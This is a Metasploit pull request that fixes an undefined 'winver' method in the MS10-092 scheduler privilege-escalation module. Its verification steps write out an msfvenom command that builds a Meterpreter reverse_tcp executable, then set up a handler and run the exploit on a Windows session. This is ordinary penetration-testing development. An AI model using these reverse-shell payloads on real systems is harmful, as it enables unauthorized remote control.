### PR TITLE
Fix #6984, Undefined method 'winver' in ms10_092_schelevator

### DIFF
--- a/modules/exploits/windows/local/ms10_092_schelevator.rb
+++ b/modules/exploits/windows/local/ms10_092_schelevator.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if check == Exploit::CheckCode::Safe
-      print_error("#{winver} is not vulnerable.")
+      print_error("#{sysinfo["OS"]} is not vulnerable.")
       return
     end
 


### PR DESCRIPTION
## What This Patch Does

This fixes an undefined method 'winver' bug when the module is used against a Windows machine that is not vulnerable.
## Verification
- [x] Start a Windows box that is not vulnerable to MS10-092 (such as Windows XP or Windows Server 2003)
- [x] Generate a Meterpreter exe payload: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/test_me.exe`
- [x] Start msfconsole
- [x] Do: `use multi/handler`
- [x] Do: `set payload windows/meterpreter/reverse_tcp`
- [x] Do: `set lhost [Your IP]`
- [x] Do: `run`
- [x] Move the exe payload to Windows, and double click on it. Your msfconsole should get a session.
- [x] If you are in the Meterpreter promopt, do `background` to background it. And that should take you back to the msf prompt.
- [x] In the msf prompt, do: `use exploits/windows/local/ms10_092_schelevator`
- [x] Do: `set sesssion 1`
- [x] Do: `run`
- [x] It should say that the target machine is "not vulnerable"
